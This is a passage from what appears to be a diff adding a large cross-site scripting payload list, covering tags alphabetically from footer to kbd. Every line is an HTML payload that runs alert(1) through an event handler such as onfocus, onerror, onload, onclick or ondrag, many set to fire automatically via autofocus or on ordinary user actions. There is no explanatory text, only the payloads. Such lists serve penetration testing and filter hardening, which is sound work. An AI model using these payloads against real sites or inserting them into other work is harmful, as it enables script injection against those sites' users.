contenteditable>test</footer> +<footer onblur=alert(1) tabindex=1 id=x></footer><input autofocus> +<footer onclick="alert(1)">test</footer> +<footer oncontextmenu="alert(1)">test</footer> +<footer oncopy="alert(1)" contenteditable>test</footer> +<footer oncut="alert(1)" contenteditable>test</footer> +<footer ondblclick="alert(1)">test</footer> +<footer onfocusout=alert(1) tabindex=1 id=x></footer><input autofocus> +<footer onkeydown="alert(1)" contenteditable>test</footer> +<footer onkeypress="alert(1)" contenteditable>test</footer> +<footer onkeyup="alert(1)" contenteditable>test</footer> +<footer onmousedown="alert(1)">test</footer> +<footer onmouseenter="alert(1)">test</footer> +<footer onmouseleave="alert(1)">test</footer> +<footer onmousemove="alert(1)">test</footer> +<footer onmouseout="alert(1)">test</footer> +<footer onmouseover="alert(1)">test</footer> +<footer onmouseup="alert(1)">test</footer> +<footer onpaste="alert(1)" contenteditable>test</footer> 
+<form draggable="true" ondrag="alert(1)">test</form> +<form draggable="true" ondragend="alert(1)">test</form> +<form draggable="true" ondragenter="alert(1)">test</form> +<form draggable="true" ondragleave="alert(1)">test</form> +<form draggable="true" ondragstart="alert(1)">test</form> +<form id=x tabindex=1 onactivate=alert(1)></form> +<form id=x tabindex=1 onbeforeactivate=alert(1)></form> +<form id=x tabindex=1 onbeforedeactivate=alert(1)></form><input autofocus> +<form id=x tabindex=1 ondeactivate=alert(1)></form><input id=y autofocus> +<form id=x tabindex=1 onfocus=alert(1)></form> +<form id=x tabindex=1 onfocusin=alert(1)></form> +<form onbeforecopy="alert(1)" contenteditable>test</form> +<form onbeforecut="alert(1)" contenteditable>test</form> +<form onbeforepaste="alert(1)" contenteditable>test</form> +<form onblur=alert(1) tabindex=1 id=x></form><input autofocus> +<form onclick="alert(1)">test</form> +<form oncontextmenu="alert(1)">test</form> +<form oncopy="alert(1)" contenteditable>test</form> +<form oncut="alert(1)" contenteditable>test</form> +<form ondblclick="alert(1)">test</form> +<form onfocusout=alert(1) tabindex=1 id=x></form><input autofocus> +<form onkeydown="alert(1)" contenteditable>test</form> +<form onkeypress="alert(1)" contenteditable>test</form> +<form onkeyup="alert(1)" contenteditable>test</form> +<form onmousedown="alert(1)">test</form> +<form onmouseenter="alert(1)">test</form> +<form onmouseleave="alert(1)">test</form> +<form onmousemove="alert(1)">test</form> +<form onmouseout="alert(1)">test</form> +<form onmouseover="alert(1)">test</form> +<form onmouseup="alert(1)">test</form> +<form onpaste="alert(1)" contenteditable>test</form> +<form onreset=alert(1)><input type=reset> +<form onsubmit=alert(1)><input type=submit> +<form><input oninvalid=alert(1) required><input type=submit> +<form><input type=search onsearch=alert(1) value="Hit return" autofocus> +<form><textarea oninvalid=alert(1) required><input type=submit> +<frame 
draggable="true" ondrag="alert(1)">test</frame> +<frame draggable="true" ondragend="alert(1)">test</frame> +<frame draggable="true" ondragenter="alert(1)">test</frame> +<frame draggable="true" ondragleave="alert(1)">test</frame> +<frame draggable="true" ondragstart="alert(1)">test</frame> +<frame id=x tabindex=1 onactivate=alert(1)></frame> +<frame id=x tabindex=1 onbeforeactivate=alert(1)></frame> +<frame id=x tabindex=1 onbeforedeactivate=alert(1)></frame><input autofocus> +<frame id=x tabindex=1 ondeactivate=alert(1)></frame><input id=y autofocus> +<frame onbeforecopy="alert(1)" contenteditable>test</frame> +<frame onbeforecut="alert(1)" contenteditable>test</frame> +<frame onbeforepaste="alert(1)" contenteditable>test</frame> +<frame onblur=alert(1) tabindex=1 id=x></frame><input autofocus> +<frame onclick="alert(1)">test</frame> +<frame oncontextmenu="alert(1)">test</frame> +<frame oncopy="alert(1)" contenteditable>test</frame> +<frame oncut="alert(1)" contenteditable>test</frame> +<frame ondblclick="alert(1)">test</frame> +<frame onfocusout=alert(1) tabindex=1 id=x></frame><input autofocus> +<frame onkeydown="alert(1)" contenteditable>test</frame> +<frame onkeypress="alert(1)" contenteditable>test</frame> +<frame onkeyup="alert(1)" contenteditable>test</frame> +<frame onmousedown="alert(1)">test</frame> +<frame onmouseenter="alert(1)">test</frame> +<frame onmouseleave="alert(1)">test</frame> +<frame onmousemove="alert(1)">test</frame> +<frame onmouseout="alert(1)">test</frame> +<frame onmouseover="alert(1)">test</frame> +<frame onmouseup="alert(1)">test</frame> +<frame onpaste="alert(1)" contenteditable>test</frame> +<frameset draggable="true" ondrag="alert(1)">test</frameset> +<frameset draggable="true" ondragend="alert(1)">test</frameset> +<frameset draggable="true" ondragenter="alert(1)">test</frameset> +<frameset draggable="true" ondragleave="alert(1)">test</frameset> +<frameset draggable="true" ondragstart="alert(1)">test</frameset> +<frameset id=x 
tabindex=1 onactivate=alert(1)></frameset> +<frameset id=x tabindex=1 onbeforeactivate=alert(1)></frameset> +<frameset id=x tabindex=1 onbeforedeactivate=alert(1)></frameset><input autofocus> +<frameset id=x tabindex=1 ondeactivate=alert(1)></frameset><input id=y autofocus> +<frameset id=x tabindex=1 onfocus=alert(1)></frameset> +<frameset id=x tabindex=1 onfocusin=alert(1)></frameset> +<frameset onbeforecopy="alert(1)" contenteditable>test</frameset> +<frameset onbeforecut="alert(1)" contenteditable>test</frameset> +<frameset onbeforepaste="alert(1)" contenteditable>test</frameset> +<frameset onblur=alert(1) tabindex=1 id=x></frameset><input autofocus> +<frameset onclick="alert(1)">test</frameset> +<frameset oncontextmenu="alert(1)">test</frameset> +<frameset oncopy="alert(1)" contenteditable>test</frameset> +<frameset oncut="alert(1)" contenteditable>test</frameset> +<frameset ondblclick="alert(1)">test</frameset> +<frameset onfocusout=alert(1) tabindex=1 id=x></frameset><input autofocus> +<frameset onkeydown="alert(1)" contenteditable>test</frameset> +<frameset onkeypress="alert(1)" contenteditable>test</frameset> +<frameset onkeyup="alert(1)" contenteditable>test</frameset> +<frameset onmousedown="alert(1)">test</frameset> +<frameset onmouseenter="alert(1)">test</frameset> +<frameset onmouseleave="alert(1)">test</frameset> +<frameset onmousemove="alert(1)">test</frameset> +<frameset onmouseout="alert(1)">test</frameset> +<frameset onmouseover="alert(1)">test</frameset> +<frameset onmouseup="alert(1)">test</frameset> +<frameset onpageshow=alert(1)> +<frameset onpaste="alert(1)" contenteditable>test</frameset> +<frameset><frame id=x onfocus=alert(1)> +<frameset><frame id=x onfocusin=alert(1)> +<frameset><frame onload=alert(1)> +<h1 draggable="true" ondrag="alert(1)">test</h1> +<h1 draggable="true" ondragend="alert(1)">test</h1> +<h1 draggable="true" ondragenter="alert(1)">test</h1> +<h1 draggable="true" ondragleave="alert(1)">test</h1> +<h1 draggable="true" 
ondragstart="alert(1)">test</h1> +<h1 id=x tabindex=1 onactivate=alert(1)></h1> +<h1 id=x tabindex=1 onbeforeactivate=alert(1)></h1> +<h1 id=x tabindex=1 onbeforedeactivate=alert(1)></h1><input autofocus> +<h1 id=x tabindex=1 ondeactivate=alert(1)></h1><input id=y autofocus> +<h1 id=x tabindex=1 onfocus=alert(1)></h1> +<h1 id=x tabindex=1 onfocusin=alert(1)></h1> +<h1 onbeforecopy="alert(1)" contenteditable>test</h1> +<h1 onbeforecut="alert(1)" contenteditable>test</h1> +<h1 onbeforepaste="alert(1)" contenteditable>test</h1> +<h1 onblur=alert(1) tabindex=1 id=x></h1><input autofocus> +<h1 onclick="alert(1)">test</h1> +<h1 oncontextmenu="alert(1)">test</h1> +<h1 oncopy="alert(1)" contenteditable>test</h1> +<h1 oncut="alert(1)" contenteditable>test</h1> +<h1 ondblclick="alert(1)">test</h1> +<h1 onfocusout=alert(1) tabindex=1 id=x></h1><input autofocus> +<h1 onkeydown="alert(1)" contenteditable>test</h1> +<h1 onkeypress="alert(1)" contenteditable>test</h1> +<h1 onkeyup="alert(1)" contenteditable>test</h1> +<h1 onmousedown="alert(1)">test</h1> +<h1 onmouseenter="alert(1)">test</h1> +<h1 onmouseleave="alert(1)">test</h1> +<h1 onmousemove="alert(1)">test</h1> +<h1 onmouseout="alert(1)">test</h1> +<h1 onmouseover="alert(1)">test</h1> +<h1 onmouseup="alert(1)">test</h1> +<h1 onpaste="alert(1)" contenteditable>test</h1> +<head draggable="true" ondrag="alert(1)">test</head> +<head draggable="true" ondragend="alert(1)">test</head> +<head draggable="true" ondragenter="alert(1)">test</head> +<head draggable="true" ondragleave="alert(1)">test</head> +<head draggable="true" ondragstart="alert(1)">test</head> +<head id=x tabindex=1 onactivate=alert(1)></head> +<head id=x tabindex=1 onbeforeactivate=alert(1)></head> +<head id=x tabindex=1 onbeforedeactivate=alert(1)></head><input autofocus> +<head id=x tabindex=1 ondeactivate=alert(1)></head><input id=y autofocus> +<head id=x tabindex=1 onfocus=alert(1)></head> +<head id=x tabindex=1 onfocusin=alert(1)></head> +<head 
onbeforecopy="alert(1)" contenteditable>test</head> +<head onbeforecut="alert(1)" contenteditable>test</head> +<head onbeforepaste="alert(1)" contenteditable>test</head> +<head onblur=alert(1) tabindex=1 id=x></head><input autofocus> +<head onclick="alert(1)">test</head> +<head oncontextmenu="alert(1)">test</head> +<head oncopy="alert(1)" contenteditable>test</head> +<head oncut="alert(1)" contenteditable>test</head> +<head ondblclick="alert(1)">test</head> +<head onfocusout=alert(1) tabindex=1 id=x></head><input autofocus> +<head onkeydown="alert(1)" contenteditable>test</head> +<head onkeypress="alert(1)" contenteditable>test</head> +<head onkeyup="alert(1)" contenteditable>test</head> +<head onmousedown="alert(1)">test</head> +<head onmouseenter="alert(1)">test</head> +<head onmouseleave="alert(1)">test</head> +<head onmousemove="alert(1)">test</head> +<head onmouseout="alert(1)">test</head> +<head onmouseover="alert(1)">test</head> +<head onmouseup="alert(1)">test</head> +<head onpaste="alert(1)" contenteditable>test</head> +<header draggable="true" ondrag="alert(1)">test</header> +<header draggable="true" ondragend="alert(1)">test</header> +<header draggable="true" ondragenter="alert(1)">test</header> +<header draggable="true" ondragleave="alert(1)">test</header> +<header draggable="true" ondragstart="alert(1)">test</header> +<header id=x tabindex=1 onactivate=alert(1)></header> +<header id=x tabindex=1 onbeforeactivate=alert(1)></header> +<header id=x tabindex=1 onbeforedeactivate=alert(1)></header><input autofocus> +<header id=x tabindex=1 ondeactivate=alert(1)></header><input id=y autofocus> +<header id=x tabindex=1 onfocus=alert(1)></header> +<header id=x tabindex=1 onfocusin=alert(1)></header> +<header onbeforecopy="alert(1)" contenteditable>test</header> +<header onbeforecut="alert(1)" contenteditable>test</header> +<header onbeforepaste="alert(1)" contenteditable>test</header> +<header onblur=alert(1) tabindex=1 id=x></header><input autofocus> +<header 
onclick="alert(1)">test</header> +<header oncontextmenu="alert(1)">test</header> +<header oncopy="alert(1)" contenteditable>test</header> +<header oncut="alert(1)" contenteditable>test</header> +<header ondblclick="alert(1)">test</header> +<header onfocusout=alert(1) tabindex=1 id=x></header><input autofocus> +<header onkeydown="alert(1)" contenteditable>test</header> +<header onkeypress="alert(1)" contenteditable>test</header> +<header onkeyup="alert(1)" contenteditable>test</header> +<header onmousedown="alert(1)">test</header> +<header onmouseenter="alert(1)">test</header> +<header onmouseleave="alert(1)">test</header> +<header onmousemove="alert(1)">test</header> +<header onmouseout="alert(1)">test</header> +<header onmouseover="alert(1)">test</header> +<header onmouseup="alert(1)">test</header> +<header onpaste="alert(1)" contenteditable>test</header> +<hgroup draggable="true" ondrag="alert(1)">test</hgroup> +<hgroup draggable="true" ondragend="alert(1)">test</hgroup> +<hgroup draggable="true" ondragenter="alert(1)">test</hgroup> +<hgroup draggable="true" ondragleave="alert(1)">test</hgroup> +<hgroup draggable="true" ondragstart="alert(1)">test</hgroup> +<hgroup id=x tabindex=1 onactivate=alert(1)></hgroup> +<hgroup id=x tabindex=1 onbeforeactivate=alert(1)></hgroup> +<hgroup id=x tabindex=1 onbeforedeactivate=alert(1)></hgroup><input autofocus> +<hgroup id=x tabindex=1 ondeactivate=alert(1)></hgroup><input id=y autofocus> +<hgroup id=x tabindex=1 onfocus=alert(1)></hgroup> +<hgroup id=x tabindex=1 onfocusin=alert(1)></hgroup> +<hgroup onbeforecopy="alert(1)" contenteditable>test</hgroup> +<hgroup onbeforecut="alert(1)" contenteditable>test</hgroup> +<hgroup onbeforepaste="alert(1)" contenteditable>test</hgroup> +<hgroup onblur=alert(1) tabindex=1 id=x></hgroup><input autofocus> +<hgroup onclick="alert(1)">test</hgroup> +<hgroup oncontextmenu="alert(1)">test</hgroup> +<hgroup oncopy="alert(1)" contenteditable>test</hgroup> +<hgroup oncut="alert(1)" 
contenteditable>test</hgroup> +<hgroup ondblclick="alert(1)">test</hgroup> +<hgroup onfocusout=alert(1) tabindex=1 id=x></hgroup><input autofocus> +<hgroup onkeydown="alert(1)" contenteditable>test</hgroup> +<hgroup onkeypress="alert(1)" contenteditable>test</hgroup> +<hgroup onkeyup="alert(1)" contenteditable>test</hgroup> +<hgroup onmousedown="alert(1)">test</hgroup> +<hgroup onmouseenter="alert(1)">test</hgroup> +<hgroup onmouseleave="alert(1)">test</hgroup> +<hgroup onmousemove="alert(1)">test</hgroup> +<hgroup onmouseout="alert(1)">test</hgroup> +<hgroup onmouseover="alert(1)">test</hgroup> +<hgroup onmouseup="alert(1)">test</hgroup> +<hgroup onpaste="alert(1)" contenteditable>test</hgroup> +<hr draggable="true" ondrag="alert(1)">test</hr> +<hr draggable="true" ondragend="alert(1)">test</hr> +<hr draggable="true" ondragenter="alert(1)">test</hr> +<hr draggable="true" ondragleave="alert(1)">test</hr> +<hr draggable="true" ondragstart="alert(1)">test</hr> +<hr id=x tabindex=1 onactivate=alert(1)></hr> +<hr id=x tabindex=1 onbeforeactivate=alert(1)></hr> +<hr id=x tabindex=1 onbeforedeactivate=alert(1)></hr><input autofocus> +<hr id=x tabindex=1 ondeactivate=alert(1)></hr><input id=y autofocus> +<hr id=x tabindex=1 onfocus=alert(1)></hr> +<hr id=x tabindex=1 onfocusin=alert(1)></hr> +<hr onbeforecopy="alert(1)" contenteditable>test</hr> +<hr onbeforecut="alert(1)" contenteditable>test</hr> +<hr onbeforepaste="alert(1)" contenteditable>test</hr> +<hr onblur=alert(1) tabindex=1 id=x></hr><input autofocus> +<hr onclick="alert(1)">test</hr> +<hr oncontextmenu="alert(1)">test</hr> +<hr oncopy="alert(1)" contenteditable>test</hr> +<hr oncut="alert(1)" contenteditable>test</hr> +<hr ondblclick="alert(1)">test</hr> +<hr onfocusout=alert(1) tabindex=1 id=x></hr><input autofocus> +<hr onkeydown="alert(1)" contenteditable>test</hr> +<hr onkeypress="alert(1)" contenteditable>test</hr> +<hr onkeyup="alert(1)" contenteditable>test</hr> +<hr onmousedown="alert(1)">test</hr> 
+<hr onmouseenter="alert(1)">test</hr> +<hr onmouseleave="alert(1)">test</hr> +<hr onmousemove="alert(1)">test</hr> +<hr onmouseout="alert(1)">test</hr> +<hr onmouseover="alert(1)">test</hr> +<hr onmouseup="alert(1)">test</hr> +<hr onpaste="alert(1)" contenteditable>test</hr> +<html draggable="true" ondrag="alert(1)">test</html> +<html draggable="true" ondragend="alert(1)">test</html> +<html draggable="true" ondragenter="alert(1)">test</html> +<html draggable="true" ondragleave="alert(1)">test</html> +<html draggable="true" ondragstart="alert(1)">test</html> +<html id=x tabindex=1 onactivate=alert(1)></html> +<html id=x tabindex=1 onbeforeactivate=alert(1)></html> +<html id=x tabindex=1 onbeforedeactivate=alert(1)></html><input autofocus> +<html id=x tabindex=1 ondeactivate=alert(1)></html><input id=y autofocus> +<html id=x tabindex=1 onfocus=alert(1)></html> +<html id=x tabindex=1 onfocusin=alert(1)></html> +<html onbeforecopy="alert(1)" contenteditable>test</html> +<html onbeforecut="alert(1)" contenteditable>test</html> +<html onbeforepaste="alert(1)" contenteditable>test</html> +<html onblur=alert(1) tabindex=1 id=x></html><input autofocus> +<html onclick="alert(1)">test</html> +<html oncontextmenu="alert(1)">test</html> +<html oncopy="alert(1)" contenteditable>test</html> +<html oncut="alert(1)" contenteditable>test</html> +<html ondblclick="alert(1)">test</html> +<html onfocusout=alert(1) tabindex=1 id=x></html><input autofocus> +<html onkeydown="alert(1)" contenteditable>test</html> +<html onkeypress="alert(1)" contenteditable>test</html> +<html onkeyup="alert(1)" contenteditable>test</html> +<html onmousedown="alert(1)">test</html> +<html onmouseenter="alert(1)">test</html> +<html onmouseleave="alert(1)">test</html> +<html onmousemove="alert(1)">test</html> +<html onmouseout="alert(1)">test</html> +<html onmouseover="alert(1)">test</html> +<html onmouseup="alert(1)">test</html> +<html onpaste="alert(1)" contenteditable>test</html> +<i draggable="true" 
ondrag="alert(1)">test</i> +<i draggable="true" ondragend="alert(1)">test</i> +<i draggable="true" ondragenter="alert(1)">test</i> +<i draggable="true" ondragleave="alert(1)">test</i> +<i draggable="true" ondragstart="alert(1)">test</i> +<i id=x tabindex=1 onactivate=alert(1)></i> +<i id=x tabindex=1 onbeforeactivate=alert(1)></i> +<i id=x tabindex=1 onbeforedeactivate=alert(1)></i><input autofocus> +<i id=x tabindex=1 ondeactivate=alert(1)></i><input id=y autofocus> +<i id=x tabindex=1 onfocus=alert(1)></i> +<i id=x tabindex=1 onfocusin=alert(1)></i> +<i onbeforecopy="alert(1)" contenteditable>test</i> +<i onbeforecut="alert(1)" contenteditable>test</i> +<i onbeforepaste="alert(1)" contenteditable>test</i> +<i onblur=alert(1) tabindex=1 id=x></i><input autofocus> +<i onclick="alert(1)">test</i> +<i oncontextmenu="alert(1)">test</i> +<i oncopy="alert(1)" contenteditable>test</i> +<i oncut="alert(1)" contenteditable>test</i> +<i ondblclick="alert(1)">test</i> +<i onfocusout=alert(1) tabindex=1 id=x></i><input autofocus> +<i onkeydown="alert(1)" contenteditable>test</i> +<i onkeypress="alert(1)" contenteditable>test</i> +<i onkeyup="alert(1)" contenteditable>test</i> +<i onmousedown="alert(1)">test</i> +<i onmouseenter="alert(1)">test</i> +<i onmouseleave="alert(1)">test</i> +<i onmousemove="alert(1)">test</i> +<i onmouseout="alert(1)">test</i> +<i onmouseover="alert(1)">test</i> +<i onmouseup="alert(1)">test</i> +<i onpaste="alert(1)" contenteditable>test</i> +<iframe draggable="true" ondrag="alert(1)">test</iframe> +<iframe draggable="true" ondragend="alert(1)">test</iframe> +<iframe draggable="true" ondragenter="alert(1)">test</iframe> +<iframe draggable="true" ondragleave="alert(1)">test</iframe> +<iframe draggable="true" ondragstart="alert(1)">test</iframe> +<iframe id=x onfocus=alert(1)> +<iframe id=x onfocusin=alert(1)> +<iframe id=x tabindex=1 onactivate=alert(1)></iframe> +<iframe id=x tabindex=1 onbeforeactivate=alert(1)></iframe> +<iframe id=x tabindex=1 
onbeforedeactivate=alert(1)></iframe><input autofocus> +<iframe id=x tabindex=1 ondeactivate=alert(1)></iframe><input id=y autofocus> +<iframe onbeforecopy="alert(1)" contenteditable>test</iframe> +<iframe onbeforecut="alert(1)" contenteditable>test</iframe> +<iframe onbeforepaste="alert(1)" contenteditable>test</iframe> +<iframe onblur=alert(1) id=x><input autofocus> +<iframe onclick="alert(1)">test</iframe> +<iframe oncontextmenu="alert(1)">test</iframe> +<iframe oncopy="alert(1)" contenteditable>test</iframe> +<iframe oncut="alert(1)" contenteditable>test</iframe> +<iframe ondblclick="alert(1)">test</iframe> +<iframe onfocusout=alert(1) id=x><input autofocus> +<iframe onkeydown="alert(1)" contenteditable>test</iframe> +<iframe onkeypress="alert(1)" contenteditable>test</iframe> +<iframe onkeyup="alert(1)" contenteditable>test</iframe> +<iframe onload=alert(1)></iframe> +<iframe onmousedown="alert(1)">test</iframe> +<iframe onmouseenter="alert(1)">test</iframe> +<iframe onmouseleave="alert(1)">test</iframe> +<iframe onmousemove="alert(1)">test</iframe> +<iframe onmouseout="alert(1)">test</iframe> +<iframe onmouseover="alert(1)">test</iframe> +<iframe onmouseup="alert(1)">test</iframe> +<iframe onpaste="alert(1)" contenteditable>test</iframe> +<iframe onreadystatechange=alert(1)></iframe> +<image draggable="true" ondrag="alert(1)">test</image> +<image draggable="true" ondragend="alert(1)">test</image> +<image draggable="true" ondragenter="alert(1)">test</image> +<image draggable="true" ondragleave="alert(1)">test</image> +<image draggable="true" ondragstart="alert(1)">test</image> +<image id=x tabindex=1 onactivate=alert(1)></image> +<image id=x tabindex=1 onbeforeactivate=alert(1)></image> +<image id=x tabindex=1 onbeforedeactivate=alert(1)></image><input autofocus> +<image id=x tabindex=1 ondeactivate=alert(1)></image><input id=y autofocus> +<image id=x tabindex=1 onfocus=alert(1)></image> +<image id=x tabindex=1 onfocusin=alert(1)></image> +<image 
onbeforecopy="alert(1)" contenteditable>test</image> +<image onbeforecut="alert(1)" contenteditable>test</image> +<image onbeforepaste="alert(1)" contenteditable>test</image> +<image onblur=alert(1) tabindex=1 id=x></image><input autofocus> +<image onclick="alert(1)">test</image> +<image oncontextmenu="alert(1)">test</image> +<image oncopy="alert(1)" contenteditable>test</image> +<image oncut="alert(1)" contenteditable>test</image> +<image ondblclick="alert(1)">test</image> +<image onfocusout=alert(1) tabindex=1 id=x></image><input autofocus> +<image onkeydown="alert(1)" contenteditable>test</image> +<image onkeypress="alert(1)" contenteditable>test</image> +<image onkeyup="alert(1)" contenteditable>test</image> +<image onmousedown="alert(1)">test</image> +<image onmouseenter="alert(1)">test</image> +<image onmouseleave="alert(1)">test</image> +<image onmousemove="alert(1)">test</image> +<image onmouseout="alert(1)">test</image> +<image onmouseover="alert(1)">test</image> +<image onmouseup="alert(1)">test</image> +<image onpaste="alert(1)" contenteditable>test</image> +<image src/onerror=alert(1)> +<image src=validimage.png onload=alert(1)> +<image src=validimage.png onloadend=alert(1)> +<image src=validimage.png onloadstart=alert(1)> +<image srcset=1 onerror=alert(1)> +<img draggable="true" ondrag="alert(1)">test</img> +<img draggable="true" ondragend="alert(1)">test</img> +<img draggable="true" ondragenter="alert(1)">test</img> +<img draggable="true" ondragleave="alert(1)">test</img> +<img draggable="true" ondragstart="alert(1)">test</img> +<img id=x tabindex=1 onactivate=alert(1)></img> +<img id=x tabindex=1 onbeforeactivate=alert(1)></img> +<img id=x tabindex=1 onbeforedeactivate=alert(1)></img><input autofocus> +<img id=x tabindex=1 ondeactivate=alert(1)></img><input id=y autofocus> +<img id=x tabindex=1 onfocus=alert(1)></img> +<img id=x tabindex=1 onfocusin=alert(1)></img> +<img onbeforecopy="alert(1)" contenteditable>test</img> +<img onbeforecut="alert(1)" 
contenteditable>test</img> +<img onbeforepaste="alert(1)" contenteditable>test</img> +<img onblur=alert(1) tabindex=1 id=x></img><input autofocus> +<img onclick="alert(1)">test</img> +<img oncontextmenu="alert(1)">test</img> +<img oncopy="alert(1)" contenteditable>test</img> +<img oncut="alert(1)" contenteditable>test</img> +<img ondblclick="alert(1)">test</img> +<img onfocusout=alert(1) tabindex=1 id=x></img><input autofocus> +<img onkeydown="alert(1)" contenteditable>test</img> +<img onkeypress="alert(1)" contenteditable>test</img> +<img onkeyup="alert(1)" contenteditable>test</img> +<img onmousedown="alert(1)">test</img> +<img onmouseenter="alert(1)">test</img> +<img onmouseleave="alert(1)">test</img> +<img onmousemove="alert(1)">test</img> +<img onmouseout="alert(1)">test</img> +<img onmouseover="alert(1)">test</img> +<img onmouseup="alert(1)">test</img> +<img onpaste="alert(1)" contenteditable>test</img> +<img src/onerror=alert(1)> +<img src=validimage.png onload=alert(1)> +<img src=validimage.png onloadend=alert(1)> +<img src=validimage.png onloadstart=alert(1)> +<img srcset=1 onerror=alert(1)> +<img srcset=validimage.png onload=alert(1)> +<img usemap=#x><map name="x"><area href onfocus=alert(1) id=x> +<img usemap=#x><map name="x"><area href onfocusin=alert(1) id=x> +<input autofocus onfocus=alert(1)> +<input autofocus onfocusin=alert(1)> +<input draggable="true" ondrag="alert(1)">test</input> +<input draggable="true" ondragend="alert(1)">test</input> +<input draggable="true" ondragenter="alert(1)">test</input> +<input draggable="true" ondragleave="alert(1)">test</input> +<input draggable="true" ondragstart="alert(1)">test</input> +<input id=x onfocus=alert(1)> +<input id=x onfocusin=alert(1)> +<input id=x tabindex=1 onactivate=alert(1)></input> +<input id=x tabindex=1 onbeforeactivate=alert(1)></input> +<input id=x tabindex=1 onbeforedeactivate=alert(1)></input><input autofocus> +<input id=x tabindex=1 ondeactivate=alert(1)></input><input id=y autofocus> 
+<input onauxclick=alert(1)> +<input onbeforecopy=alert(1) value="XSS" autofocus> +<input onbeforecut=alert(1) value="XSS" autofocus> +<input onbeforepaste=alert(1) value="" autofocus> +<input onblur=alert(1) id=x><input autofocus> +<input onchange=alert(1) value=xss> +<input onclick="alert(1)">test</input> +<input oncontextmenu="alert(1)">test</input> +<input oncopy=alert(1) value="XSS" autofocus> +<input oncut=alert(1) value="XSS" autofocus> +<input ondblclick="alert(1)">test</input> +<input onfocusout=alert(1) id=x><input autofocus> +<input oninput=alert(1) value=xss> +<input onkeydown="alert(1)" contenteditable>test</input> +<input onkeypress="alert(1)" contenteditable>test</input> +<input onkeyup="alert(1)" contenteditable>test</input> +<input onmousedown="alert(1)">test</input> +<input onmouseenter="alert(1)">test</input> +<input onmouseleave="alert(1)">test</input> +<input onmousemove="alert(1)">test</input> +<input onmouseout="alert(1)">test</input> +<input onmouseover="alert(1)">test</input> +<input onmouseup="alert(1)">test</input> +<input onpaste=alert(1) value="" autofocus> +<input onselect=alert(1) value="XSS" autofocus> +<input type=checkbox id=x onfocus=alert(1)> +<input type=checkbox id=x onfocusin=alert(1)> +<input type=image onloadend=alert(1) src=validimage.png> +<input type=image onloadstart=alert(1) src=validimage.png> +<input type=image src=1 onerror=alert(1)> +<input type=image src=validimage.png onload=alert(1)> +<input type=radio id=x onfocus=alert(1)> +<input type=radio id=x onfocusin=alert(1)> +<ins draggable="true" ondrag="alert(1)">test</ins> +<ins draggable="true" ondragend="alert(1)">test</ins> +<ins draggable="true" ondragenter="alert(1)">test</ins> +<ins draggable="true" ondragleave="alert(1)">test</ins> +<ins draggable="true" ondragstart="alert(1)">test</ins> +<ins id=x tabindex=1 onactivate=alert(1)></ins> +<ins id=x tabindex=1 onbeforeactivate=alert(1)></ins> +<ins id=x tabindex=1 onbeforedeactivate=alert(1)></ins><input 
autofocus> +<ins id=x tabindex=1 ondeactivate=alert(1)></ins><input id=y autofocus> +<ins id=x tabindex=1 onfocus=alert(1)></ins> +<ins id=x tabindex=1 onfocusin=alert(1)></ins> +<ins onbeforecopy="alert(1)" contenteditable>test</ins> +<ins onbeforecut="alert(1)" contenteditable>test</ins> +<ins onbeforepaste="alert(1)" contenteditable>test</ins> +<ins onblur=alert(1) tabindex=1 id=x></ins><input autofocus> +<ins onclick="alert(1)">test</ins> +<ins oncontextmenu="alert(1)">test</ins> +<ins oncopy="alert(1)" contenteditable>test</ins> +<ins oncut="alert(1)" contenteditable>test</ins> +<ins ondblclick="alert(1)">test</ins> +<ins onfocusout=alert(1) tabindex=1 id=x></ins><input autofocus> +<ins onkeydown="alert(1)" contenteditable>test</ins> +<ins onkeypress="alert(1)" contenteditable>test</ins> +<ins onkeyup="alert(1)" contenteditable>test</ins> +<ins onmousedown="alert(1)">test</ins> +<ins onmouseenter="alert(1)">test</ins> +<ins onmouseleave="alert(1)">test</ins> +<ins onmousemove="alert(1)">test</ins> +<ins onmouseout="alert(1)">test</ins> +<ins onmouseover="alert(1)">test</ins> +<ins onmouseup="alert(1)">test</ins> +<ins onpaste="alert(1)" contenteditable>test</ins> +<isindex draggable="true" ondrag="alert(1)">test</isindex> +<isindex draggable="true" ondragend="alert(1)">test</isindex> +<isindex draggable="true" ondragenter="alert(1)">test</isindex> +<isindex draggable="true" ondragleave="alert(1)">test</isindex> +<isindex draggable="true" ondragstart="alert(1)">test</isindex> +<isindex id=x tabindex=1 onactivate=alert(1)></isindex> +<isindex id=x tabindex=1 onbeforeactivate=alert(1)></isindex> +<isindex id=x tabindex=1 onbeforedeactivate=alert(1)></isindex><input autofocus> +<isindex id=x tabindex=1 ondeactivate=alert(1)></isindex><input id=y autofocus> +<isindex id=x tabindex=1 onfocus=alert(1)></isindex> +<isindex id=x tabindex=1 onfocusin=alert(1)></isindex> +<isindex onbeforecopy="alert(1)" contenteditable>test</isindex> +<isindex onbeforecut="alert(1)" 
contenteditable>test</isindex> +<isindex onbeforepaste="alert(1)" contenteditable>test</isindex> +<isindex onblur=alert(1) tabindex=1 id=x></isindex><input autofocus> +<isindex onclick="alert(1)">test</isindex> +<isindex oncontextmenu="alert(1)">test</isindex> +<isindex oncopy="alert(1)" contenteditable>test</isindex> +<isindex oncut="alert(1)" contenteditable>test</isindex> +<isindex ondblclick="alert(1)">test</isindex> +<isindex onfocusout=alert(1) tabindex=1 id=x></isindex><input autofocus> +<isindex onkeydown="alert(1)" contenteditable>test</isindex> +<isindex onkeypress="alert(1)" contenteditable>test</isindex> +<isindex onkeyup="alert(1)" contenteditable>test</isindex> +<isindex onmousedown="alert(1)">test</isindex> +<isindex onmouseenter="alert(1)">test</isindex> +<isindex onmouseleave="alert(1)">test</isindex> +<isindex onmousemove="alert(1)">test</isindex> +<isindex onmouseout="alert(1)">test</isindex> +<isindex onmouseover="alert(1)">test</isindex> +<isindex onmouseup="alert(1)">test</isindex> +<isindex onpaste="alert(1)" contenteditable>test</isindex> +<isindex type=image onload=alert(1) src=validimage.png> +<isindex type=image src=1 onerror=alert(1)> +<kbd draggable="true" ondrag="alert(1)">test</kbd> +<kbd draggable="true" ondragend="alert(1)">test</kbd> +<kbd draggable="true" ondragenter="alert(1)">test</kbd> +<kbd draggable="true" ondragleave="alert(1)">test</kbd> +<kbd draggable="true" ondragstart="alert(1)">test</kbd> +<kbd id=x tabindex=1 onactivate=alert(1)></kbd> +<kbd id=x tabindex=1 onbeforeactivate=alert(1)></kbd> +<kbd id=x tabindex=1 onbeforedeactivate=alert(1)></kbd><input autofocus> +<kbd id=x tabindex=1 ondeactivate=alert(1)></kbd><input id=y autofocus> +<kbd id=x tabindex=1 onfocus=alert(1)></kbd> +<kbd id=x tabindex=1 